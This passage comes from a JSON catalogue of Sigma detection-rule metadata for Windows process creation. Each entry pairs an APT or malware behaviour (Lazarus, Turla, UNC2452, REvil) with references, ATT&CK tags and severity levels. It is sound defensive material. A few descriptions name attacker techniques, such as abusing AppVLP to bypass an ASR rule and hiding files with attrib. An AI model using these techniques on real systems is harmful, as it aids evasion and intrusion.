"https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.g0009", - "attack.t1068" - ], - "creation_date": "2019/03/04", - "filename": "proc_creation_win_apt_hurricane_panda.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Judgement Panda activity as described in Global Threat Report 2019 by Crowdstrike", - "uuid": "03e2746e-2b31-42f1-ab7a-eb39365b2422", - 
"value": "Judgement Panda Exfil Activity", - "meta": { - "refs": [ - "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_judgement_panda_gtr19.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.g0010", - "attack.credential_access", - "attack.t1003.001", - "attack.exfiltration", - "attack.t1560.001" - ], - "creation_date": "2019/02/21", - "filename": "proc_creation_win_apt_judgement_panda_gtr19.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Registry modifications performed by Ke3chang malware in campaigns running in 2019 and 2020", - "uuid": "7b544661-69fc-419f-9a59-82ccc328f205", - "value": "Ke3chang Registry Key Modifications", - "meta": { - "refs": [ - "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf", - "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ke3chang_regadd.yml" - ], - "tags": [ - "attack.g0004", - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2020/06/18", - "filename": "proc_creation_win_apt_ke3chang_regadd.yml", - "author": "Markus Neis, Swisscom", - "level": "critical", - "falsepositive": [ - "Will need to be looked for combinations of those processes" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity", - "uuid": "4a12fa47-c735-4032-a214-6fab5b120670", - "value": "Lazarus Activity Apr21", - "meta": { - "refs": [ - 
"https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_apr21.yml" - ], - "tags": [ - "attack.g0032", - "attack.execution", - "attack.t1106" - ], - "creation_date": "2021/04/20", - "filename": "proc_creation_win_apt_lazarus_activity_apr21.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Should not be any false positives" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects different process creation events as described in various threat reports on Lazarus group activity", - "uuid": "24c4d154-05a4-4b99-b57d-9b977472443a", - "value": "Lazarus Activity Dec20", - "meta": { - "refs": [ - "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", - "https://www.hvs-consulting.de/lazarus-report/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_dec20.yml" - ], - "tags": [ - "attack.g0032", - "attack.execution", - "attack.t1059" - ], - "creation_date": "2020/12/23", - "filename": "proc_creation_win_apt_lazarus_activity_dec20.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Overlap with legitimate process activity in some cases (especially selection 3 and 4)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects different loaders as described in various threat reports on Lazarus group activity", - "uuid": "7b49c990-4a9a-4e65-ba95-47c9cc448f6e", - "value": "Lazarus Loaders", - "meta": { - "refs": [ - "https://www.hvs-consulting.de/lazarus-report/", - "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_loader.yml" - ], - "tags": [ - "attack.g0032", - "attack.execution", - "attack.t1059" - ], - "creation_date": "2020/12/23", - "filename": "proc_creation_win_apt_lazarus_loader.yml", - "author": "Florian Roth, wagga", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects executables launched outside their default directories as used by Lazarus Group (Bluenoroff)", - "uuid": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b", - "value": "Lazarus Session Highjacker", - "meta": { - "refs": [ - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_session_highjack.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.005" - ], - "creation_date": "2020/06/03", - "filename": "proc_creation_win_apt_lazarus_session_highjack.yml", - "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious command line patterns as seen being used by MERCURY threat actor", - "uuid": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", - "value": "MERCURY Command Line Patterns", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mercury.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.g0069" - ], - "creation_date": "2022/08/26", - "filename": 
"proc_creation_win_apt_mercury.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detecting DNS tunnel activity for Muddywater actor", - "uuid": "36222790-0d43-4fe8-86e4-674b27809543", - "value": "DNS Tunnel Technique from MuddyWater", - "meta": { - "refs": [ - "https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/", - "https://www.vmray.com/analyses/5ad401c3a568/report/overview.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_muddywater_dnstunnel.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.004" - ], - "creation_date": "2020/06/04", - "filename": "proc_creation_win_apt_muddywater_dnstunnel.yml", - "author": "@caliskanfurkan_", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects specific process parameters as used by Mustang Panda droppers", - "uuid": "2d87d610-d760-45ee-a7e6-7a6f2a65de00", - "value": "Mustang Panda Dropper", - "meta": { - "refs": [ - "https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/", - "https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/", - "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml" - ], - "tags": [ - "attack.t1587.001", - "attack.resource_development" - ], - "creation_date": "2019/10/30", - "filename": "proc_creation_win_apt_mustangpanda.yml", - "author": "Florian Roth, oscd.community", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } 
- }, - { - "description": "Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)", - "uuid": "5de632bc-7fbd-4c8a-944a-fce55c59eae5", - "value": "REvil Kaseya Incident Malware Patterns", - "meta": { - "refs": [ - "https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers", - "https://www.joesandbox.com/analysis/443736/0/html", - "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b", - "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/", - "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059", - "attack.g0115" - ], - "creation_date": "2021/07/03", - "filename": "proc_creation_win_apt_revil_kaseya.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Silence downloader. 
These commands are hardcoded into the binary.", - "uuid": "170901d1-de11-4de7-bccb-8fa13678d857", - "value": "Silence.Downloader V3", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_silence_downloader_v3.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001", - "attack.discovery", - "attack.t1057", - "attack.t1082", - "attack.t1016", - "attack.t1033", - "attack.g0091" - ], - "creation_date": "2019/11/01", - "filename": "proc_creation_win_apt_silence_downloader_v3.yml", - "author": "Alina Stepchenkova, Roman Rezvukhin, Group-IB, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", - "uuid": "958d81aa-8566-4cea-a565-59ccd4df27b0", - "value": "Defrag Deactivation", - "meta": { - "refs": [ - "https://securelist.com/apt-slingshot/84312/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_slingshot.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.005", - "attack.s0111" - ], - "creation_date": "2019/03/04", - "filename": "proc_creation_win_apt_slingshot.yml", - "author": "Florian Roth, Bartlomiej Czyz (@bczyz1)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Trojan loader activity as used by APT28", - "uuid": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", - "value": "Sofacy Trojan Loader Activity", - "meta": { - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/", - "https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?environmentId=100", - 
"https://twitter.com/ClearskySec/status/960924755355369472", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sofacy.yml" - ], - "tags": [ - "attack.g0007", - "attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "car.2013-10-002", - "attack.t1218.011" - ], - "creation_date": "2018/03/01", - "filename": "proc_creation_win_apt_sofacy.yml", - "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", - "uuid": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", - "value": "SOURGUM Actor Behaviours", - "meta": { - "refs": [ - "https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection", - "https://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml", - "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sourgrum.yml" - ], - "tags": [ - "attack.t1546", - "attack.t1546.015", - "attack.persistence", - "attack.privilege_escalation" - ], - "creation_date": "2021/06/15", - "filename": "proc_creation_win_apt_sourgrum.yml", - "author": "MSTIC, FPT.EagleEye", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", - "uuid": "18da1007-3f26-470f-875d-f77faf1cab31", - "value": "Ps.exe Renamed SysInternals Tool", 
- "meta": { - "refs": [ - "https://www.us-cert.gov/ncas/alerts/TA17-293A", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ta17_293a_ps.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.g0035", - "attack.t1036.003", - "car.2013-05-009" - ], - "creation_date": "2017/10/22", - "filename": "proc_creation_win_apt_ta17_293a_ps.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Renamed SysInternals tool" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents", - "uuid": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", - "value": "TA505 Dropper Load Pattern", - "meta": { - "refs": [ - "https://twitter.com/ForensicITGuy/status/1334734244120309760", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ta505_dropper.yml" - ], - "tags": [ - "attack.execution", - "attack.g0092", - "attack.t1106" - ], - "creation_date": "2020/12/08", - "filename": "proc_creation_win_apt_ta505_dropper.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", - "uuid": "d1aa3382-abab-446f-96ea-4de52908210b", - "value": "TAIDOOR RAT DLL Load", - "meta": { - "refs": [ - "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_taidoor.yml" - ], - "tags": [ - "attack.execution", - "attack.t1055.001" - ], - "creation_date": "2020/07/30", - "filename": "proc_creation_win_apt_taidoor.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - 
"logsource.product": "windows" - } - }, - { - "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", - "uuid": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", - "value": "TropicTrooper Campaign November 2018", - "meta": { - "refs": [ - "https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_tropictrooper.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/11/12", - "filename": "proc_creation_win_apt_tropictrooper.yml", - "author": "@41thexplorer, Microsoft Defender ATP", - "level": "high", - "falsepositive": "No established falsepositives", - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects automated lateral movement by Turla group", - "uuid": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", - "value": "Turla Group Lateral Movement", - "meta": { - "refs": [ - "https://securelist.com/the-epic-turla-operation/65545/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_commands_critical.yml" - ], - "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059", - "attack.lateral_movement", - "attack.t1021.002", - "attack.discovery", - "attack.t1083", - "attack.t1135" - ], - "creation_date": "2017/11/07", - "filename": "proc_creation_win_apt_turla_commands_critical.yml", - "author": "Markus Neis", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects automated lateral movement by Turla group", - "uuid": "75925535-ca97-4e0a-a850-00b5c00779dc", - "value": "Automated Turla Group Lateral 
Movement", - "meta": { - "refs": [ - "https://securelist.com/the-epic-turla-operation/65545/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_commands_medium.yml" - ], - "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059", - "attack.lateral_movement", - "attack.t1021.002", - "attack.discovery", - "attack.t1083", - "attack.t1135" - ], - "creation_date": "2017/11/07", - "filename": "proc_creation_win_apt_turla_commands_medium.yml", - "author": "Markus Neis", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects commands used by Turla group as reported by ESET in May 2020", - "uuid": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", - "value": "Turla Group Commands May 2020", - "meta": { - "refs": [ - "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_comrat_may20.yml" - ], - "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059.001", - "attack.t1053.005", - "attack.t1027" - ], - "creation_date": "2020/05/26", - "filename": "proc_creation_win_apt_turla_comrat_may20.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries", - "uuid": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f", - "value": "UNC2452 Process Creation Patterns", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_cmds.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2021/01/22", - "filename": "proc_creation_win_apt_unc2452_cmds.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports", - "uuid": "b7155193-8a81-4d8f-805d-88de864ca50c", - "value": "UNC2452 PowerShell Pattern", - "meta": { - "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", - "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1047" - ], - "creation_date": "2021/01/20", - "filename": "proc_creation_win_apt_unc2452_ps.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. 
The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016.", - "uuid": "7453575c-a747-40b9-839b-125a0aae324b", - "value": "Unidentified Attacker November 2018", - "meta": { - "refs": [ - "https://twitter.com/DrunkBinary/status/1063075530180886529", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unidentified_nov_18.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218.011" - ], - "creation_date": "2018/11/20", - "filename": "proc_creation_win_apt_unidentified_nov_18.yml", - "author": "@41thexplorer, Microsoft Defender ATP", - "level": "high", - "falsepositive": "No established falsepositives", - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", - "uuid": "3121461b-5aa0-4a41-b910-66d25524edbb", - "value": "Winnti Malware HK University Campaign", - "meta": { - "refs": [ - "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_winnti_mal_hk_jan20.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" - ], - "creation_date": "2020/02/01", - "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml", - "author": "Florian Roth, Markus Neis", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", - "uuid": "73d70463-75c9-4258-92c6-17500fe972f2", - "value": "Winnti Pipemon Characteristics", - "meta": { - "refs": [ - "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_winnti_pipemon.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" - ], - "creation_date": "2020/07/30", - "filename": "proc_creation_win_apt_winnti_pipemon.yml", - "author": "Florian Roth, oscd.community", - "level": "critical", - "falsepositive": [ - "Legitimate setups that use similar flags" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects activity mentioned in Operation Wocao report", - "uuid": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", - "value": "Operation Wocao Activity", - "meta": { - "refs": [ - "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", - "https://twitter.com/SBousseaden/status/1207671369963646976", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_wocao.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", - "attack.execution", - "attack.t1053.005", - "attack.t1059.001" - ], - "creation_date": "2019/12/20", - "filename": "proc_creation_win_apt_wocao.yml", - "author": "Florian Roth, frack113", - "level": "high", - "falsepositive": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a ZxShell start by the called and well-known function name", - "uuid": "f0b70adb-0075-43b0-9745-e82a1c608fcc", - "value": "ZxShell Malware", - "meta": { - "refs": [ - "https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_zxshell.yml" - ], - "tags": [ - 
"attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "attack.t1218.011", - "attack.s0412", - "attack.g0001" - ], - "creation_date": "2017/07/20", - "filename": "proc_creation_win_apt_zxshell.yml", - "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.", - "uuid": "24de4f3b-804c-4165-b442-5a06a2302c7e", - "value": "Arbitrary Shell Command Execution Via Settingcontent-Ms", - "meta": { - "refs": [ - "https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_arbitrary_shell_execution_via_settingcontent.yml" - ], - "tags": [ - "attack.t1204", - "attack.t1566.001", - "attack.execution", - "attack.initial_access" - ], - "creation_date": "2020/03/13", - "filename": "proc_creation_win_arbitrary_shell_execution_via_settingcontent.yml", - "author": "Sreeman", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", - "uuid": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", - "value": "Phishing Pattern ISO in Archive", - "meta": { - "refs": [ - "https://twitter.com/1ZRR4H/status/1534259727059787783", - "https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_archiver_iso_phishing.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566" - ], - "creation_date": "2022/06/07", - "filename": "proc_creation_win_archiver_iso_phishing.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Application Virtualization Utility is included with Microsoft Office. We are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n", - "uuid": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", - "value": "Using AppVLP To Circumvent ASR File Path Rule", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_asr_bypass_via_appvlp_re.yml" - ], - "tags": [ - "attack.t1218", - "attack.defense_evasion", - "attack.execution" - ], - "creation_date": "2020/03/13", - "filename": "proc_creation_win_asr_bypass_via_appvlp_re.yml", - "author": "Sreeman", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", - "uuid": "245f92e3-c4da-45f1-9070-bc552e06db11", - "value": "Atlassian Confluence CVE-2021-26084", - "meta": { - "refs": [ - "https://nvd.nist.gov/vuln/detail/CVE-2021-26084", - "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html", - 
"https://github.com/h3v0x/CVE-2021-26084_Confluence", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_atlassian_confluence_cve_2021_26084_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.execution", - "attack.t1190", - "attack.t1059" - ], - "creation_date": "2021/09/08", - "filename": "proc_creation_win_atlassian_confluence_cve_2021_26084_exploit.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of attrib.exe to hide files from users.", - "uuid": "4281cb20-2994-4580-aa63-c8b86d019934", - "value": "Hiding Files with Attrib.exe", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_hiding_files.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.001" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_attrib_hiding_files.yml", - "author": "Sami Ruohonen", - "level": "low", - "falsepositive": [ - "IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)", - "Msiexec.exe hiding desktop.ini" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Marks a file as a system file using the attrib.exe utility", - "uuid": "bb19e94c-59ae-4c15-8c12-c563d23fe52b", - "value": "Set Windows System File with Attrib", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.001" - ], - "creation_date": "2022/02/04", - "filename": "proc_creation_win_attrib_system.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of attrib with \"+s\" option to set suspicious script or executable as system files to hide them from users and make them unable to delete with simple rights. The rule limit the search to specific extensions and directories to avoid FP's", - "uuid": "efec536f-72e8-4656-8960-5e85d091345b", - "value": "Set Suspicious Files as System Files Using Attrib", - "meta": { - "refs": [ - "https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4", - "https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.001" - ], - "creation_date": "2022/06/28", - "filename": "proc_creation_win_attrib_system_susp_paths.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Once established within a system or 